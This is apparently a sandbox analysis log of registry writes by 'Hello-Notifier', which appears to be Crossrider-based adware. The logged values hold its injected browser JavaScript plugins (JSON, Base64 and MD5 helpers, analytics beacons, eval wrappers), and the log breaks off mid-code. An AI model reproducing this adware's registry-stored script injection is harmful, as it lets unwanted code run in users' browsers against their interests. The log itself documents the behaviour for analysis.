| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\14\JavaScript = "\n//------------------ PLUGIN CrossriderUtils START ------------------\nif(typeof(appAPI)===\"undefined\"){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==\"undefined\"&&typeof window.navigator!==\"undefined\"&&typeof window.navigator.userAgent!==\"undefined\"){CR__bIsIEWindow=/MSIE (\\d+\\.\\d+);/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==\"undefined\"));appAPI.JSON={};if(typeof JSON!==\"undefined\"&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?\"0\"+n:n;}if(typeof Date.prototype.to_CR_JSON!==\"function\"){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear()+\"-\"+f(this.getUTCMonth()+1)+\"-\"+f(this.getUTCDate())+\"T\"+f(this.getUTCHours())+\":\"+f(this.getUTCMinutes())+\":\"+f(this.getUTCSeconds())+\"Z\":null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\\u0000\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,escapable=/[\\\\\\\"\\x00-\\x1f\\x7f-\\x9f\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,gap,indent,meta={\"\\b\":\"\\\\b\",\"\\t\":\"\\\\t\",\"\\n\":\"\\\\n\",\"\\f\":\"\\\\f\",\"\\r\":\"\\\\r\",'\"':'\\\\\"',\"\\\\\":\"\\\\\\\\\"},rep;function quote(string){escapable.lastIndex=0;return escapable.test(string)?'\"'+string.replace(escapable,function(a){var c=meta[a];return typeof c===\"string\"?c:\"\\\\u\"+(\"0000\"+a.charCodeAt(0).toString(16)).slice(-4);})+'\"':'\"'+string+'\"';}function str(key,holder){var i,k,v,length,mind=gap,partial,value=holder[key];if(value&&typeof value===\"object\"&&typeof value.to_CR_JSON===\"function\"){value=value.to_CR_JSON(key);}if(typeof rep===\"function\"){value=rep.call(holder,key,value);}switch(typeof value){case\"string\":return quote(value);case\"number\":return isFinite(value)?String(value):\"null\";case\"boolean\":case\"null\":return String(value);case\"object\":if(!value){return\"null\";}gap+=indent;partial=[];if(Object.prototype.toString.apply(value)===\"[object Array]\"){length=value.length;for(i=0;i<length;i+=1){partial[i]=str(i,value)||\"null\";}v=partial.length===0?\"[]\":gap?\"[\\n\"+gap+partial.join(\",\\n\"+gap)+\"\\n\"+mind+\"]\":\"[\"+partial.join(\",\")+\"]\";gap=mind;return v;}if(rep&&typeof rep===\"object\"){length=rep.length;for(i=0;i<length;i+=1){k=rep[i];if(typeof k===\"string\"){v=str(k,value);if(v){partial.push(quote(k)+(gap?\": \":\":\")+v);}}}}else{for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=str(k,value);if(v){partial.push(quote(k)+(gap?\": \":\":\")+v);}}}}v=partial.length===0?\"{}\":gap?\"{\\n\"+gap+partial.join(\",\\n\"+gap)+\"\\n\"+mind+\"}\":\"{\"+partial.join(\",\")+\"}\";gap=mind;return v;}}if(typeof appAPI.JSON.stringify!==\"function\"){appAPI.JSON.stringify=function(value,replacer,space){var i;gap=\"\";indent=\"\";if(typeof space===\"number\"){for(i=0;i<space;i+=1){indent+=\" \";}}else{if(typeof space===\"string\"){indent=space;}}rep=replacer;if(replacer&&typeof replacer!==\"function\"&&(typeof replacer!==\"object\"||typeof replacer.length!==\"number\")){throw new Error(\"appAPI.JSON.stringify\");}return str(\"\",{\"\":value});};}if(typeof appAPI.JSON.parse!==\"function\"){appAPI.JSON.parse=function(text,reviver){var j;function walk(holder,key){var k,v,value=holder[key];if(value&&typeof value===\"object\"){for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=walk(value,k);if(v!==undefined){value[k]=v;}else{delete value[k];}}}}return reviver.call(holder,key,value);}text=String(text);cx.lastIndex=0;if(cx.test(text)){text=text.replace(cx,function(a){return\"\\\\u\"+(\"0000\"+a.charCodeAt(0).toString(16)).slice(-4);});}if(/^[\\],:{}\\s]*$/.test(text.replace(/\\\\(?:[\"\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g,\"@\").replace(/\"[^\"\\\\\\n\\r]*\"|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g,\"]\").replace(/(?:^|:|,)(?:\\s*\\[)+/g,\"\"))){j=eval(\"(\"+text+\")\");return typeof reviver===\"function\"?walk({\"\":j},\"\"):j;}throw new SyntaxError(\"appAPI.JSON.parse\");};}}());}(function(a){a.debug=function(h,f){if(!a.isDebugMode()){return;}var b=!a.debug.settings.console;if(f!==null){b=f;}try{if(!b){var g=new Date();var i=(((a.debug.settings.timestamp)&&(typeof(h)==\"string\"))?(g.toLocaleTimeString()+\".\"+g.getMilliseconds()+\": \"+h):h);console.log(i);}else{alert(h);}}catch(c){alert(h);}};a.debug.settings={console:true,timestamp:true};})(appAPI);(function(a){if(typeof a.installer===\"undefined\"){a.installer={};}a.installer.getParams=function(){if(appAPI.internal&&appAPI.internal.installer&&appAPI.internal.installer.installerParams&&appAPI.internal.installer.installerParams.source_id&&appAPI.internal.installer.installerParams.source_id!==\"__SOURCE_ID__\"&&appAPI.internal.installer.installerParams.sub_id&&appAPI.internal.installer.installerParams.sub_id!==\"__SUB_ID__\"&&appAPI.internal.installer.installerParams.uzid&&appAPI.internal.installer.installerParams.uzid!==\"__UZID__\"){return appAPI.internal.installer.installerParams;}return(a.db.get(\"InstallerParams\")||{});};a.installer.getUnixTime=function(){return(a.db.get(\"InstallationTime\")||null);};a.installer.getIsFirstInstall=function(){if(!appAPI.internal||!appAPI.internal.installer||!appAPI.internal.installer.isFirstInstall){return true;}else{return appAPI.internal.installer.isFirstInstall===\"__FIRST_INSTALL__\";}};a.installer.getInstallerVersion=function(){var c=\"0\";var b=appAPI.internal.db.get(\"__installer_version__\");if(appAPI.internal&&appAPI.internal.installer&&appAPI.internal.installer.version&&appAPI.internal.installer.version!==\"__INSTALLER_VERSION__\"){c=appAPI.internal.installer.version;appAPI.internal.db.set(\"__installer_version__\",appAPI.internal.installer.version);}if(b){c=b;}return c;};})(appAPI);(function(b){b.time={};b.time.now=function(){return a(0);};b.time.secondsFromNow=function(c){return a(c*1000);};b.time.secondsAgo=function(c){return a(c*-1000);};b.time.minutesFromNow=function(c){return a(c*60*1000);};b.time.minutesAgo=function(c){return a(c*60*-1000);};b.time.hoursFromNow=function(c){return a(c*3600*1000);};b.time.hoursAgo=function(c){return a(c*3600*-1000);};b.time.daysFromNow=function(c){return a(c*3600*24*1000);};b.time.daysAgo=function(c){return a(c*3600*24*-1000);};b.time.yearsFromNow=function(c){return a(c*365*3600*24*1000);};b.time.yearsAgo=function(c){return a(c*365*3600*24*-1000);};function a(c){return new Date(new Date().getTime()+c);}})(appAPI);(function(a){a.analytics={};a.analytics.trackUrl=function(b){function c(h,j,e){function o(q,i){return q+Math.floor(Math.random()*(i-q));}var l=1000000000,p=o(l,9999999999),f=o(10000000,99999999),g=o(l,2147483647),n=(new Date()).getTime(),m=window.location,k=new Image(),d=document.location.protocol+\"//www.google-analytics.com/__utm.gif?utmwv=1.3&utmn=\"+p+\"&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=\"+j+\"&utmr=\"+m+\"&utmp=\"+e+\"&utmac=\"+h+\"&utmcc=__utma%3D\"+f+\".\"+g+\".\"+n+\".\"+n+\".\"+n+\".2%3B%2B__utmb%3D\"+f+\"%3B%2B__utmc%3D\"+f+\"%3B%2B__utmz%3D\"+f+\".\"+n+\".2.2.utmccn%3D(referral)%7Cutmcsr%3D\"+m.host+\"%7Cutmcct%3D\"+m.pathname+\"%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\"+f+\".-%3B\";k.src=d;}if((this.settings.account===\"\")||(this.settings.domain===\"\")){a.debug(\"Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\");return;}c(this.settings.account,this.settings.domain,b);};a.analytics.trackEvent=function(c,e,b,d){function f(m,o,h,k,n,u,v){function t(x,i){return x+Math.floor(Math.random()*(i-x));}var q=1000000000,w=t(q,9999999999),j=t(10000000,99999999),l=t(q,2147483647),s=(new Date()).getTime(),r=window.location,p=new Image(),g=document.location.protocol+\"//www.google-analytics.com/__utm.gif?utmwv=4.8.9&utmn=\"+w+\"&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=\"+o+\"&utmr=-&utmt=event&utme=5(\"+k+\"*\"+n+\"*\"+u+\")(\"+v+\")&utmp=\"+h+\"&utmac=\"+m+\"&utmcc=__utma%3D\"+j+\".\"+l+\".\"+s+\".\"+s+\".\"+s+\".2%3B%2B__utmb%3D\"+j+\"%3B%2B__utmc%3D\"+j+\"%3B%2B__utmz%3D\"+j+\".\"+s+\".2.2.utmccn%3D(referral)%7Cutmcsr%3D\"+r.host+\"%7Cutmcct%3D\"+r.pathname+\"%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\"+j+\".-%3B\";p.src=g;}if(typeof(c)!=\"string\"){c=\"\";}if(typeof(e)!=\"string\"){e=\"\";}if(typeof(b)!=\"string\"){b=\"\";}if(typeof(d)!=\"number\"){d=0;}if((c===\"\")&&(e===\"\")&&(b===\"\")&&(d===0)){a.debug(\"Error: In order to use trackEvent you must specify the event parameters!\");return;}if((this.settings.account===\"\")||(this.settings.domain===\"\")){a.debug(\"Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\");return;}f(this.settings.account,this.settings.domain,document.location.href,c,e,b,d);};a.analytics.settings={account:\"\",domain:\"\"};})(appAPI);(function(){if(typeof appAPI===\"undefined\"){appAPI={};}if(typeof appAPI.utils===\"undefined\"){appAPI.utils={};}appAPI.utils.indexOf=function(arr,searchElement){if(!arr){return -1;}var len=arr.length;if(len===0){return -1;}if(typeof arr.indexOf!==\"undefined\"){return arr.indexOf(searchElement,arguments[2]);}var n=0;if(arguments.length>2){n=Number(arguments[2]);if(n!=n){n=0;}else{if(n!=0&&n!=Infinity&&n!=-Infinity){n=(n>0||-1)*Math.floor(Math.abs(n));}}}if(n>=len){return -1;}var k=n>=0?n:Math.max(len-Math.abs(n),0);for(;k<len;k++){if(k in arr&&arr[k]===searchElement){return k;}}return -1;};(function(){var isFactory=function(type){return function(obj){var clas=Object.prototype.toString.call(obj).slice(8,-1);return obj!==undefined&&obj!==null&&clas===type;};};var isUndefined=function(obj){return typeof obj===\"undefined\";};var isNull=function(obj){return obj===null;};appAPI.utils.isObject=isFactory(\"Object\");appAPI.utils.isNumber=isFactory(\"Number\");appAPI.utils.isString=isFactory(\"String\");appAPI.utils.isArray=isFactory(\"Array\");appAPI.utils.isBoolean=isFactory(\"Boolean\");appAPI.utils.isFunction=isFactory(\"Function\");appAPI.utils.isDefined=function(elem){return(!isUndefined(elem)&&!isNull(elem));};}());appAPI.utils.getHost=function(url){var parser=document.createElement(\"a\");parser.href=url;return parser.hostname;};appAPI.utils.getDomain=(function(){var TLDs=[\"ac\",\"ad\",\"ae\",\"aero\",\"af\",\"ag\",\"ai\",\"al\",\"am\",\"an\",\"ao\",\"aq\",\"ar\",\"arpa\",\"as\",\"asia\",\"at\",\"au\",\"aw\",\"ax\",\"az\",\"ba\",\"bb\",\"bd\",\"be\",\"bf\",\"bg\",\"bh\",\"bi\",\"biz\",\"bj\",\"bm\",\"bn\",\"bo\",\"br\",\"bs\",\"bt\",\"bv\",\"bw\",\"by\",\"bz\",\"ca\",\"cat\",\"cc\",\"cd\",\"cf\",\"cg\",\"ch\",\"ci\",\"ck\",\"cl\",\"cm\",\"cn\",\"co\",\"com\",\"coop\",\"cr\",\"cu\",\"cv\",\"cx\",\"cy\",\"cz\",\"de\",\"dj\",\"dk\",\"dm\",\"do\",\"dz\",\"ec\",\"edu\",\"ee\",\"eg\",\"er\",\"es\",\"et\",\"eu\",\"fi\",\"fj\",\"fk\",\"fm\",\"fo\",\"fr\",\"ga\",\"gb\",\"gd\",\"ge\",\"gf\",\"gg\",\"gh\",\"gi\",\"gl\",\"gm\",\"gn\",\"gov\",\"gp\",\"gq\",\"gr\",\"gs\",\"gt\",\"gu\",\"gw\",\"gy\",\"hk\",\"hm\",\"hn\",\"hr\",\"ht\",\"hu\",\"id\",\"ie\",\"il\",\"im\",\"in\",\"info\",\"int\",\"io\",\"iq\",\"ir\",\"is\",\"it\",\"je\",\"jm\",\"jo\",\"jobs\",\"jp\",\"ke\",\"kg\",\"kh\",\"ki\",\"km\",\"kn\",\"kp\",\"kr\",\"kw\",\"ky\",\"kz\",\"la\",\"lb\",\"lc\",\"li\",\"lk\",\"lr\",\"ls\",\"lt\",\"lu\",\"lv\",\"ly\",\"ma\",\"mc\",\"md\",\"me\",\"mg\",\"mh\",\"mil\",\"mk\",\"ml\",\"mm\",\"mn\",\"mo\",\"mobi\",\"mp\",\"mq\",\"mr\",\"ms\",\"mt\",\"mu\",\"museum\",\"mv\",\"mw\",\"mx\",\"my\",\"mz\",\"na\",\"name\",\"nc\",\"ne\",\"net\",\"nf\",\"ng\",\"ni\",\"nl\",\"no\",\"np\",\"nr\",\"nu\",\"nz\",\"om\",\"org\",\"pa\",\"pe\",\"pf\",\"pg\",\"ph\",\"pk\",\"pl\",\"pm\",\"pn\",\"pr\",\"pro\",\"ps\",\"pt\",\"pw\",\"py\",\"qa\",\"re\",\"ro\",\"rs\",\"ru\",\"rw\",\"sa\",\"sb\",\"sc\",\"sd\",\"se\",\"sg\",\"sh\",\"si\",\"sj\",\"sk\",\"sl\",\"sm\",\"sn\",\"so\",\"sr\",\"st\",\"su\",\"sv\",\"sy\",\"sz\",\"tc\",\"td\",\"tel\",\"tf\",\"tg\",\"th\",\"tj\",\"tk\",\"tl\",\"tm\",\"tn\",\"to\",\"tp\",\"tr\",\"travel\",\"tt\",\"tv\",\"tw\",\"tz\",\"ua\",\"ug\",\"uk\",\"us\",\"uy\",\"uz\",\"va\",\"vc\",\"ve\",\"vg\",\"vi\",\"vn\",\"vu\",\"wf\",\"ws\",\"xn--0zwm56d\",\"xn--11b5bs3a9aj6g\",\"xn--3e0b707e\",\"xn--45brj9c\",\"xn--80akhbyknj4f\",\"xn--90a3ac\",\"xn--9t4b11yi5a\",\"xn--clchc0ea0b2g2a9gcd\",\"xn--deba0ad\",\"xn--fiqs8s\",\"xn--fiqz9s\",\"xn--fpcrj9c3d\",\"xn--fzc2c9e2c\",\"xn--g6w251d\",\"xn--gecrj9c\",\"xn--h2brj9c\",\"xn--hgbk6aj7f53bba\",\"xn--hlcj6aya9esc7a\",\"xn--j6w193g\",\"xn--jxalpdlp\",\"xn--kgbechtv\",\"xn--kprw13d\",\"xn--kpry57d\",\"xn--lgbbat1ad8j\",\"xn--mgbaam7a8h\",\"xn--mgbayh7gpa\",\"xn--mgbbh1a71e\",\"xn--mgbc0a9azcg\",\"xn--mgberp4a5d4ar\",\"xn--o3cw4h\",\"xn--ogbpf8fl\",\"xn--p1ai\",\"xn--pgbs0dh\",\"xn--s9brj9c\",\"xn--wgbh1c\",\"xn--wgbl6a\",\"xn--xkc2al3hye2a\",\"xn--xkc2dl3a5ee0h\",\"xn--yfro4i67o\",\"xn--ygbi2ammx\",\"xn--zckzah\",\"xxx\",\"ye\",\"yt\",\"za\",\"zm\",\"zw\"].join();return function(url){var parts,part,tldLevelsChecked;host=appAPI.utils.getHost(url);parts=host.split(\".\");if(parts[0]===\"www\"&&parts[1]!==\"com\"){parts.shift();}while(parts.length>0){part=parts.pop();tldLevelsChecked++;if(tldLevelsChecked>2||appAPI.utils.indexOf(TLDs,part)<0){break;}}return part;};}());appAPI.utils.newFunction=function(code){try{return new Function(code);}catch(e){if(appAPI.platform==\"FF\"&&e.message.indexOf(\"blocked by CSP\")>-1&&FFInternal&&typeof FFInternal.newFunction===\"function\"){return FFInternal.newFunction(code);}}};appAPI.utils.eval=eval;if(appAPI.platform===\"FF\"){try{eval(\"var testEval = true;\");}catch(e){appAPI.utils.eval=function(code,scope){if(e.message.indexOf(\"blocked by CSP\")>-1&&FFInternal&&typeof FFInternal.newFunction===\"function\"){var foo=FFInternal.newFunction(code);if(scope){foo.call(scope);return;}foo();}};}}appAPI.utils.trim=function(str){if(!appAPI.utils.isString(str)){return str;}if(typeof str.trim===\"function\"){return str.trim();}else{return str.replace(/^\\s+|\\s+$/g,\"\");}};}());(function(){appAPI.utils.Base64={_keyStr:\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\",encode:function(c){var a=\"\";var k,h,f,j,g,e,d;var b=0;c=appAPI.utils.Base64._utf8_encode(c);while(b<c.length){k=c.charCodeAt(b++);h=c.charCodeAt(b++);f=c.charCodeAt(b++);j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64;}else{if(isNaN(f)){d=64;}}a=a+this._keyStr.charAt(j)+this._keyStr.charAt(g)+this._keyStr.charAt(e)+this._keyStr.charAt(d);}return a;},decode:function(c){var a=\"\";var k,h,f;var j,g,e,d;var b=0;c=c.replace(/[^A-Za-z0-9\\+\\/\\=]/g,\"\");while(b<c.length){j=this._keyStr.indexOf(c.charAt(b++));g=this._keyStr.indexOf(c.charAt(b++));e=this._keyStr.indexOf(c.charAt(b++));d=this._keyStr.indexOf(c.charAt(b++));k=(j<<2)|(g>>4);h=((g&15)<<4)|(e>>2);f=((e&3)<<6)|d;a=a+String.fromCharCode(k);if(e!=64){a=a+String.fromCharCode(h);}if(d!=64){a=a+String.fromCharCode(f);}}a=appAPI.utils.Base64._utf8_decode(a);return a;},_utf8_encode:function(b){b=b.replace(/\\r\\n/g,\"\\n\");var a=\"\";for(var e=0;e<b.length;e++){var d=b.charCodeAt(e);if(d<128){a+=String.fromCharCode(d);}else{if((d>127)&&(d<2048)){a+=String.fromCharCode((d>>6)|192);a+=String.fromCharCode((d&63)|128);}else{a+=String.fromCharCode((d>>12)|224);a+=String.fromCharCode(((d>>6)&63)|128);a+=String.fromCharCode((d&63)|128);}}}return a;},_utf8_decode:function(a){var b=\"\";var d=0;var e=c1=c2=0;while(d<a.length){e=a.charCodeAt(d);if(e<128){b+=String.fromCharCode(e);d++;}else{if((e>191)&&(e<224)){c2=a.charCodeAt(d+1);b+=String.fromCharCode(((e&31)<<6)|(c2&63));d+=2;}else{c2=a.charCodeAt(d+1);c3=a.charCodeAt(d+2);b+=String.fromCharCode(((e&15)<<12)|((c2&63)<<6)|(c3&63));d+=3;}}}return b;}};})();(function(){function a(b){if(appAPI[b]){return appAPI[b];}return function(){var c=Array.prototype.slice.call(arguments,0);return window[b].apply(window,c);};}appAPI.setTimeout=a(\"setTimeout\");appAPI.setInterval=a(\"setInterval\");appAPI.clearTimeout=a(\"clearTimeout\");appAPI.clearInterval=a(\"clearInterval\");}());(function(){appAPI.utils.MD5=(function(){var q=0;var y=\"\";function p(B){return z(n(r(B)));}function o(B){return b(n(r(B)));}function i(B,C){return e(n(r(B)),C);}function w(B,C){return z(g(r(B),r(C)));}function l(B,C){return b(g(r(B),r(C)));}function h(B,D,C){return e(g(r(B),r(D)),C);}function A(){return p(\"abc\").toLowerCase()==\"900150983cd24fb0d6963f7d28e17f72\";}function n(B){return u(f(m(B),B.length*8));}function g(D,G){var F=m(D);if(F.length>16){F=f(F,D.length*8);}var B=Array(16),E=Array(16);for(var C=0;C<16;C++){B[C]=F[C]^909522486;E[C]=F[C]^1549556828;}var H=f(B.concat(m(G)),512+G.length*8);return u(f(E.concat(H),512+128));}function z(D){if(typeof q===\"undefined\"){q=0;}var F=q?\"0123456789ABCDEF\":\"0123456789abcdef\";var C=\"\";var B;for(var E=0;E<D.length;E++){B=D.charCodeAt(E);C+=F.charAt((B>>>4)&15)+F.charAt(B&15);}return C;}function b(D){if(typeof y===\"undefined\"){y=\"\";}var G=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";var C=\"\";var B=D.length;for(var F=0;F<B;F+=3){var H=(D.charCodeAt(F)<<16)|(F+1<B?D.charCodeAt(F+1)<<8:0)|(F+2<B?D.charCodeAt(F+2):0);for(var E=0;E<4;E++){if(F*8+E*6>D.length*8){C+=y;}else{C+=G.charAt((H>>>6*(3-E))&63);}}}return C;}function e(L,D){var C=D.length;var K,G,B,M,F;var J=Array(Math.ceil(L.length/2));for(K=0;K<J.length;K++){J[K]=(L.charCodeAt(K*2)<<8)|L.charCodeAt(K*2+1);}var I=Math.ceil(L.length*8/(Math.log(D.length)/Math.log(2)));var H=Array(I);for(G=0;G<I;G++){F=Array();M=0;for(K=0;K<J.length;K++){M=(M<<16)+J[K];B=Math.floor(M/C);M-=B*C;if(F.length>0||B>0){F[F.length]=B;}}H[G]=M;J=F;}var E=\"\";for(K=H.length-1;K>=0;K--){E+=D.charAt(H[K]);}return E;}function r(D){var C=\"\";var E=-1;var B,F;while(++E<D.length){B=D.charCodeAt(E);F=E+1<D.length?D.charCodeAt(E+1):0;if(55296<=B&&B<=56319&&56320<=F&&F<=57343){B=65536+((B&1023)<<10)+(F&1023);E++;}if(B<=127){C+=String.fromCharCode(B);}else{if(B<=2047){C+=String.fromCharCode(192|((B>>>6)&31),128|(B&63));}else{if(B<=65535){C+=String.fromCharCode(224|((B>>>12)&15),128|((B>>>6)&63),128|(B&63));}else{if(B<=2097151){C+=String.fromCharCode(240|((B>>>18)&7),128|((B>>>12)&63),128|((B>>>6)&63),128|(B&63));}}}}}return C;}function v(C){var B=\"\";for(var D=0;D<C.length;D++){B+=String.fromCharCode(C.charCodeAt(D)&255,(C.charCodeAt(D)>>>8)&255);}return B;}function k(C){var B=\"\";for(var D=0;D<C.length;D++){B+=String.fromCharCode((C.charCodeAt(D)>>>8)&255,C.charCodeAt(D)&255);}return B;}function m(C){var B=Array(C.length>>2);for(var D=0;D<B.length;D++){B[D]=0;}for(var D=0;D<C.length*8;D+=8){B[D>>5]|=(C.charCodeAt(D/8)&255)<<(D%32);}return B;}function u(C){var B=\"\";for(var D=0;D<C.length*32;D+=8){B+=String.fromCharCode((C[D>>5]>>>(D%32))&255);}return B;}function f(L,G){L[G>>5]|=128<<((G)%32);L[(((G+64)>>>9)<<4)+14]=G;var K=1732584193;var J=-271733879;var I=-1732584194;var H=271733878;for(var D=0;D<L.length;D+=16){var F=K;var E=J;var C=I;var B=H;K=c(K,J,I,H,L[D+0],7,-680876936);H=c(H,K,J,I,L[D+1],12,-389564586);I=c(I,H,K,J,L[D+2],17,606105819);J=c(J,I,H,K,L[D+3],22,-1044525330);K=c(K,J,I,H,L[D+4],7,-176418897);H=c(H,K,J,I,L[D+5],12,1200080426);I=c(I,H,K,J,L[D+6],17,-1473231341);J=c(J,I,H,K,L[D+7],22,-45705983);K=c(K,J,I,H,L[D+8],7,1770035416);H=c(H,K,J,I,L[D+9],12,-1958414417);I=c(I,H,K,J,L[D+10],17,-42063);J=c(J,I,H,K,L[D+11],22,-1990404162);K=c(K,J,I,H,L[D+12],7,1804603682);H=c(H,K,J,I,L[D+13],12,-40341101);I=c(I,H,K,J,L[D+14],17,-1502002290);J=c(J,I,H,K,L[D+15],22,1236535329);K=j(K,J,I,H,L[D+1],5,-165796510);H=j(H,K,J,I,L[D+6],9,-1069501632);I=j(I,H,K,J,L[D+11],14,643717713);J=j(J,I,H,K,L[D+0],20,-373897302);K=j(K,J,I,H,L[D+5],5,-701558691);H=j(H,K,J,I,L[D+10],9,38016083);I=j(I,H,K,J,L[D+15],14,-660478335);J=j(J,I,H,K,L[D+4],20,-405537848);K=j(K,J,I,H,L[D+9],5,568446438);H=j(H,K,J,I,L[D+14],9,-1019803690);I=j(I,H,K,J,L[D+3],14,-187363961);J=j(J,I,H,K,L[D+8],20,1163531501);K=j(K,J,I,H,L[D+13],5,-1444681467);H=j(H,K,J,I,L[D+2],9,-51403784);I=j(I,H,K,J,L[D+7],14,1735328473);J=j(J,I,H,K,L[D+12],20,-1926607734);K=t(K,J,I,H,L[D+5],4,-378558);H=t(H,K,J,I,L[D+8],11,-2022574463);I=t(I,H,K,J,L[D+11],16,1839030562);J=t(J,I,H,K,L[D+14],23,-35309556);K=t(K,J,I,H,L[D+1],4,-1530992060);H=t(H,K,J,I,L[D+4],11,1272893353);I=t(I,H,K,J,L[D+7],16,-155497632);J=t(J,I,H,K,L[D+10],23,-1094730640);K=t(K,J,I,H,L[D+13],4,681279174);H=t(H,K,J,I,L[D+0],11,-358537222);I=t(I,H,K,J,L[D+3],16,-722521979);J=t(J,I,H,K,L[D+6],23,76029189);K=t(K,J,I,H,L[D+9],4,-640364487);H=t(H,K,J,I,L[D+12],11,-421815835);I=t(I,H,K,J,L[D+15],16,530742520);J=t(J,I,H,K,L[D+2],23,-995338651);K=a(K,J,I,H,L[D+0],6,-198630844);H=a(H,K,J,I,L[D+7],10,1126891415);I=a(I,H,K,J,L[D+14],15,-1416354905);J=a(J,I,H,K,L[D+5],21,-57434055);K=a(K,J,I,H,L[D+12],6,1700485571);H=a(H,K,J,I,L[D+3],10,-1894986606);I=a(I,H,K,J,L[D+10],15,-1051523);J=a(J,I,H,K,L[D+1],21,-2054922799);K=a(K,J,I,H,L[D+8],6,1873313359);H=a(H,K,J,I,L[D+15],10,-30611744);I=a(I,H,K,J,L[D+6],15,-1560198380);J=a(J,I,H,K,L[D+13],21,1309151649);K=a(K,J,I,H,L[D+4],6,-145523070);H=a(H,K,J,I,L[D+11],10,-1120210379);I=a(I,H,K,J,L[D+2],15,718787259);J=a(J,I,H,K,L[D+9],21,-343485551);K=s(K,F);J=s(J,E);I=s(I,C);H=s(H,B);}return Array(K,J,I,H);}function d(G,D,C,B,F,E){return s(x(s(s(D,G),s(B,E)),F),C);}function c(D,C,H,G,B,F,E){return d((C&H)|((~C)&G),D,C,B,F,E);}function j(D,C,H,G,B,F,E){return d((C&G)|(H&(~G)),D,C,B,F,E);}function t(D,C,H,G,B,F,E){return d(C^H^G,D,C,B,F,E);}function a(D,C,H,G,B,F,E){return d(H^(C|(~G)),D,C,B,F,E);}function s(B,E){var D=(B&65535)+(E&65535);var C=(B>>16)+(E>>16)+(D>>16);return(C<<16)|(D&65535);}function x(B,C){return(B<<C)|(B>>>(32-C));}return{encode:p};}());}());\n//------------------ PLUGIN CrossriderUtils END ------------------\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\ModeType = "production" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\42\JavaScript = "\n//------------------ PLUGIN IEInternal START ------------------\nvar Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===\"undefined\"){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==\"undefined\"){window={};}if(typeof window.document===\"undefined\"){window.document={};document=window.document;}if(typeof window.alert===\"undefined\"){window.alert=function(b){var c;if(typeof b===\"undefined\"){c=\"undefined\";}else{if(b===null){c=\"null\";}else{c=b.toString();}}if(typeof c===\"string\"){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===\"undefined\"){window.console={};console=window.console;}if(typeof console.log===\"undefined\"){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===\"undefined\"){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===\"undefined\"){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===\"undefined\"){window.console.error=function(a){};console.error=window.console.error;}if(typeof console.assert===\"undefined\"){window.console.assert=function(a){};console.assert=window.console.assert;}if(typeof console.dir===\"undefined\"){window.console.dir=function(a){};console.dir=window.console.dir;}if(typeof console.clear===\"undefined\"){window.console.clear=function(a){};console.clear=window.console.clear;}if(typeof console.profile===\"undefined\"){window.console.profile=function(a){};console.profile=window.console.profile;}if(typeof console.profileEnd===\"undefined\"){window.console.profileEnd=function(a){};console.profileEnd=window.console.profileEnd;}(function($){if(typeof appAPI.internal===\"undefined\"){appAPI.internal={};}if(typeof appAPI.internal.prefs===\"undefined\"){appAPI.internal.prefs={};}appAPI.internal.prefs.getChar=function(key,section){var value=$.getPref(key,section);if(value===\"__CR_@FAILED_DOWNLOAD_READ@_CR__\"){return null;}return 